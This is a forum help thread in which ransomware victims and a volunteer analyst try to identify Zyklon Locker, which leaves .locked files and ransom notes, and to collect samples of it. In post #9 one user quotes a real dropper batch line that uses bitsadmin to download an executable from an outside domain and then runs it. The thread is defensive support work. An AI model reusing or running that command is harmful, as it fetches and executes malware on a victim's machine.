Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Zyklon Locker (GNL) Help Topic - .locked and UNLOCK_FILES_INSTRUCTIONS.html


  • Please log in to reply
52 replies to this topic

#1 stefanb

stefanb

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:07:36 PM

Posted 16 April 2016 - 11:52 AM

Hi there,

 

i came acros this website after using google getting info about ransomware, glad i found this!

i hope you can help me out.

 

Since 1hour i found out my files became .locked extensension wich i found strange, then on desktop and lots off maps i found 2 notes.

 

a html file : UNLOCK_FILES_INSTRUCTIONS

a text file: UNLOCK_FILES_INSTRUCTIONS

 

the text file says this: Open the UNLOCK_FILES_INSTRUCTIONS.html file with your internet browser for instructions.

 

I cant find any name once i open the files wich kind off ransomware program it is.

 

i hope you can help me out.

 

Thanks

 

Edit:

 

I see all my files that are locked are like,

 

bill.!ID!8MMnF!ID!.locked

 

the word bill is not the ransom program just something i used for example, the word  !ID!8MMnF!ID!. is shown in a files locked


Edited by stefanb, 16 April 2016 - 12:08 PM.


BC AdBot (Login to Remove)

 


#2 cybercynic

cybercynic

  • Members
  • 544 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Edge Of Tomorrow
  • Local time:01:36 PM

Posted 16 April 2016 - 12:09 PM

Hi there,

 

i came acros this website after using google getting info about ransomware, glad i found this!

i hope you can help me out.

 

Since 1hour i found out my files became .locked extensension wich i found strange, then on desktop and lots off maps i found 2 notes.

 

a html file : UNLOCK_FILES_INSTRUCTIONS

a text file: UNLOCK_FILES_INSTRUCTIONS

 

the text file says this: Open the UNLOCK_FILES_INSTRUCTIONS.html file with your internet browser for instructions.

 

I cant find any name once i open the files wich kind off ransomware program it is.

 

i hope you can help me out.

 

Thanks

 

 

Upload a copy of the ransom note and a copy of an encrypted file to:

 

https://id-ransomware.malwarehunterteam.com/

 

If it is a known ransomware, the site will identify it. The files will also by reviewed by Demonslay.


We are drowning in information - and starving for wisdom.


#3 stefanb

stefanb
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:07:36 PM

Posted 16 April 2016 - 12:13 PM

Hey

 

thanks for the quick reply.

 

I did this but its not a known ransomware.

I tried to make a screenshot off it and show it here, but it looks like paint and lots off programs are gone somehow on the pc



#4 cybercynic

cybercynic

  • Members
  • 544 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Edge Of Tomorrow
  • Local time:01:36 PM

Posted 16 April 2016 - 12:18 PM

Hey

 

thanks for the quick reply.

 

I did this but its not a known ransomware.

I tried to make a screenshot off it and show it here, but it looks like paint and lots off programs are gone somehow on the pc

Upload the same files here:

 

 http://www.bleepingcomputer.com/submit-malware.php?channel=168

 

They will be reviewed by BC analysts. That may take some time. 


We are drowning in information - and starving for wisdom.


#5 stefanb

stefanb
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:07:36 PM

Posted 16 April 2016 - 12:27 PM

this is the website (note) i get

made this photo with my phone

 

w27ZShw.jpg


Edited by stefanb, 16 April 2016 - 12:28 PM.


#6 cybercynic

cybercynic

  • Members
  • 544 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Edge Of Tomorrow
  • Local time:01:36 PM

Posted 16 April 2016 - 12:39 PM

this is the website (note) i get

made this photo with my phone

 

w27ZShw.jpg

If you've uploaded an encrypted file to the site I mentioned in my last post, someone will be along presently to look at this topic. Demonslay or some other BC analyst will need to look at this ransomware. Again, this may take some time. These people are all volunteers, and have a life outside of this website. 


We are drowning in information - and starving for wisdom.


#7 stefanb

stefanb
  • Topic Starter

  • Members
  • 4 posts
  • OFFLINE
  •  
  • Local time:07:36 PM

Posted 16 April 2016 - 12:41 PM

i have uploaded it yes,

ofcourse i know these people dont check this website all the time, i thought i give them as much information as possible to help



#8 Demonslay335

Demonslay335

    Ransomware Hunter


  • Security Colleague
  • 3,000 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:12:36 PM

Posted 16 April 2016 - 02:43 PM

I've taken a look at the files you submitted. It looks new, haven't seen a ransom note that looks like that.

 

Based on the extension, it may be another HiddenTear/EDA2 variant. We will need the original executable of the malware to analyze and confirm if there is a method of cracking it.

 

If you can find any suspicious files that look like it may be the ransomware, please submit them here: http://www.bleepingcomputer.com/submit-malware.php?channel=168

 

You may scan with HitmanPro and MalwareBytes to look for any infections if you haven't seen anything.


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#9 Blister2016

Blister2016

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:07:36 PM

Posted 19 April 2016 - 02:18 PM

Dear all

 

Same ransomware at a customer....

 

He is infected with a little bat file.

In his %APPDATA%\Roaming dir was a little .bat file: freepalistine.bat, with the following content:

bitsadmin  /transfer myjob  /download  /priority high http://www.firemail.online/download.exe "%APPDATA%\Hdgdgdte.exe">nul&start %APPDATA%\Hdgdgdte.exe
 

 

With other words, he downloaded an executable from the domain. I already have cleaned up the virus with Eset Online Scanner, MalwareBytes and some other tools.

The files are unfortunatly still encrypted and have the .locked extension. Also a NAS is compromitted. No backup of that NAS.

 

Do you have suggestions ?



#10 Demonslay335

Demonslay335

    Ransomware Hunter


  • Security Colleague
  • 3,000 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:12:36 PM

Posted 19 April 2016 - 02:23 PM

The account has been suspended, so the download is inactive (good and bad). Is the Hdgdgdte.exe still available from quarantine?

 

If you have an suspicious files in quarantine, we need a sample in order to assess the ransomware and whether there is a flaw with it. You may submit any samples you find to the link I provided in the previous post.


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#11 luuksie

luuksie

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:07:36 PM

Posted 10 May 2016 - 12:29 PM

Same problem and ransomware as Blister2016.

- *.locked files

- freepalestine.bat file

etc etc

 

We payed 0,5 bitcoin and received the passwords but no decryption

What can we do?

 

thanks alot!



#12 Demonslay335

Demonslay335

    Ransomware Hunter


  • Security Colleague
  • 3,000 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:12:36 PM

Posted 10 May 2016 - 01:05 PM

Same problem and ransomware as Blister2016.

- *.locked files

- freepalestine.bat file

etc etc

 

We payed 0,5 bitcoin and received the passwords but no decryption

What can we do?

 

thanks alot!

 

Please post any suspicious files, the password they gave you, and a sample encrypted file here: http://www.bleepingcomputer.com/submit-malware.php?channel=168


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#13 luuksie

luuksie

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:07:36 PM

Posted 10 May 2016 - 01:56 PM

Just uploaded 3 files. If you need more please let me know!

thanks so much!



#14 Demonslay335

Demonslay335

    Ransomware Hunter


  • Security Colleague
  • 3,000 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:USA
  • Local time:12:36 PM

Posted 10 May 2016 - 03:02 PM

Just uploaded 3 files. If you need more please let me know!

thanks so much!

 

Thanks. I've been suspecting this may be a HiddenTear variant, but my decrypter didn't work with those passwords (could just be they altered the algorithm if it is still derived from HT).

 

Do you have that batch file still? We really need a sample of the malware itself to analyze now.


logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic]

ransomnotecleaner-25.png RansomNoteCleaner - Remove Ransom Notes Left Behind [Support Topic]

cryptosearch-25.pngCryptoSearch - Find Files Encrypted by Ransomware [Support Topic]

If I have helped you and you wish to support my ransomware fighting, you may support me here.


#15 luuksie

luuksie

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Local time:07:36 PM

Posted 10 May 2016 - 03:11 PM

just uploaded 2 batch files






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users